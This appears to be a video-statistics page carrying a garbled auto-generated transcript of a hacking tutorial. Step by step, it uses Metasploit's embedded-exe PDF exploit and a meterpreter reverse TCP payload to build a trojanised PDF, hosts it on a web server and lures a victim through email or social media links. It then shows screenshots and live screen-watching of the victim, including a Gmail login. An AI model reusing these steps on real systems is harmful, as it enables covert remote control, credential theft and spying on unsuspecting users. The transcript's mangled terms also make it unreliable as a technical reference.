virus.pdf

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
PDF is used widely for sharing information through email attachments through links to a website or to some documents or some storage system and of course it can be used as a carrier of malicious software I want to be my dad so the hacker would have a PDF document that they would use and what to do next is use an operating system like say call Linux and within here they will create a malicious software and then attach the malicious software right here into the PDF document next up what happens is that the user goes ahead and download the document into the computer and then they execute on the file and that's it game over okay wait a minute what I mean by game over game over meaning that this computer right here that uses open up will now be remotely controlled by the hacker and this is super easy to do and yes you'll be learning how to do just that you can show off to your friends your colleagues your family members before we get started imagine this you're a hacker in your black hoodie and cap and you're typing away hacking away and it's only going to knock on your door and please comes up because you're doing something illegal you have unauthorized access to disk computers that you're targeting and within minutes you are in jail and of course the downside of going to jail it's not that you get arrested the reason is because you can no longer watch Mr Hacker's live videos anymore so if you're ready to look as cool as Mr hagaloy let's go so right in front of us is colonics which is going to be a radical hacking operating system for today's tutorial the first thing you're going to do is go ahead and open up thumbnail so once you launch terminal go ahead and enter sudo msf console so Sudo is for super user do and msf console is for MATA sploit that we're using it's Port creating the malicious executable or PDF document in which we can then send over to the Target users and once they open up the file that's it we gain full access into your machine and we'll go ahead and answer the following here which in this case is use exploit Windows followed by slash in this case we have file format followed by slash Adobe underscore PDF and beta executable heat anther on that all right enter show up options right here and what we're going to set right now is the payload so we'll set the payload as Windows x64 followed by interpreter and a reverse underscore TCP all right done you can go ahead and enter ipaddr to look at the IP address that has been assigned to your columns machine so in this case we have 182 168.0 to 106. so this is going to be the IP address that we'll be using as part of launching the attack against Target user next up you can enter show options right here once more and you'll be able to see at the top all right this is the file that will be created this is the output file name of evil.pdf the end file name or which is template.pdf and then launch message which is to view the encrypted content plus take the do not show this message again box and press open and once you're ready go ahead and enter exploit hit enter on that and now we have created the file stored at root.msf for localevil.pdf and what we're doing right now is to move the newly created file into VAR www.html which is going to be the web server that will be starting as a service to host this malicious file go ahead and hit enter on that boom all right super user do password done next up what we need to do now is to go ahead and start up our web server send a system CTL for my start apogee2. service hit enter on that and of course we can also check on the status of it by entering sudo system Studio status aputure.service and that's it done this is basically open up a web server so that audits can access your service in the network and right in front of us we have a Windows 10 computer that is going to be targeted so we open up a browser and the user just has to click onto the link either through a social media message to an email attachment and whatnot in this case we're going over into the website I hit enter on that it says save file I go ahead and select and save this file over into desktop safe boom done and you can see right here the file has been downloaded into the desktop and all we got to do right now is just double click under the phone open it up and that's it we gain full remote control into the computer but wait a second before we do that when you start up our hacking server so that we can have the connection over from a Target computer that then allow us to remotely manage this machine heading back to color Linux as well as my display all we can do right now is enter use exploit multi Handler and all we got to do is to set up our payload so in this case we're using the payload of set payload Windows slash x64 pulled by slash matupater followed by slash reverse underscore TCP and enter on that enter show options and we got the Outpost all right so we have the missing value for L host and we need to set this right in so let's go ahead and enter L host of 192.168.0.106 So This is the IP address of Carla Linux and once you're ready in three two one enter exploit boom reverse TCP Handler on 192.168.0.106 on Port 44444 now heading back to the Target Windows computer all I got to do is double click onto the evil.pdf click save all right click open is anything happening right now I don't see any loading whatsoever what could be going on so I hit back over Kyle Linux right now and you can see right here my interpreter session won't open we are in it's game over strike alloy what do you mean by game over can you show us example of it well absolutely if you see right here all I got to do is enter screen followed by the following a screenshot I hit enter on that and it will take a screenshot of what is going on right now in the Target computer so if I go ahead and open up this file say for example in this case we have the fall of avwt and so on so forth copy the selection I hid over here right now I do a open on the target file so in this case I hit open on that and you can see right here we have the image viewer of what's going on in desktop and in fact we can take it to the next level what I mean by that let's use screen share instead so I enter screen share I hit enter and you see the following right now we're seeing live what is going on right in front of the computer now heading over into the target computer if I was to go ahead and open up Firefox I go to gmail.com and I log right in I enter my password whatever if I go back over colonics we can see the update that's going on live right now we can see exactly what the user is doing this is crazy now I know what you're thinking is there a way for us to end big the malicious code into an existing PDF that we want to apply to well the answer is yes of course let me show you how to keep watching so the first thing you need is a PDF document that you can then apply the malicious code onto so in this case I have created a file here using River of his writer that you can access directly from colonics and you can see right here Mr hackaloy is very handsome so I've already exported this into a PDF document so we can see right here on the documents so I enter print working directory we have loyal engine slash documents and can see the following hackerloy.pdf so this is the legitimate PDF and then after which we're going to attach the malicious executable into it so in order to do the attachment all we got to do right now is go ahead and enter sudo msf console one more time so in this case we are using Metasploit to help us attach that so once metasploy is ready all we're going to do is to use the same exploit that we did earlier to do just that so same thing go ahead enter use exploit Windows followed by slash file format Follow by slash Adobe around the score and in this case we have the one that we used earlier which is PDF and baited [Applause] and baited exe all right hit enter on that enter show options so in this case we will be using set payload to Windows x64 interpreter followed by slash reverse TCP right and then go hit and in this case we are targeting the following we are going to be changing up the file name a little and we'll also be changing the in file name so I'm going to set the file name as hacker lawy virus dot PDF all right and then this info name is going to be the file that we just created earlier that we'll be using all right so in this case I can set the in file name all right to slash loin down young slash hackerloy.pdf all right so this is going to be the target documents slash hackerlaw.pdf hit enter on that enter show options again verify all the values so you can see right here file name hecolloy virus info name documents hackalado PDF we got the IP address right we got a port number right and once you're ready go ahead and enter exploit and you want to look at the following here this is the hacker Lloyd virus.pdf store and root Ms F4 local hackerloyvirus.pdf so let's go ahead and copy this directory I'll write all the path and what we can do now is go ahead and do a pseudo move and then follow my slash VAR www.html slash hacker longvirus.pdf you can enter on that enter your super user due password done next up just hosting a listener as usual enter the following of use exploit multi Handler and it will be using the same payload again see it's at payload as Windows x64 my temperature reverse underscore TCP enter show options ensure that the values are the same set L host 182 168.0.106 Panther exploit The Listener is up right now on hackers machine going back to the Windows computer right here the payload could be coming in from an email attachment could be from a social media message or whatnot so I enter 182 168 in this case all right so this is going to be the target IP address that will be hosting this specific file all right so in this case hacker law virus.pdf hit enter go ahead and save to file on the desktop and if I go to desktop right now you can see the file right here in the middle and all I have to do same thing double click onto hackerloidvirus.pdf save click yes replace existing file that I downloaded earlier click open Mr hackaloy yes very handsome now jumping back over colonics you see magic right here my temperature Session One open we are in once again we have everything that we need and we have full remote control into the computer it's game over
Info
Channel: Loi Liang Yang
Views: 192,369
Rating: undefined out of 5
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: xYBsXkxDRh0
Channel Id: undefined
Length: 10min 19sec (619 seconds)
Published: Sat Jul 01 2023
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.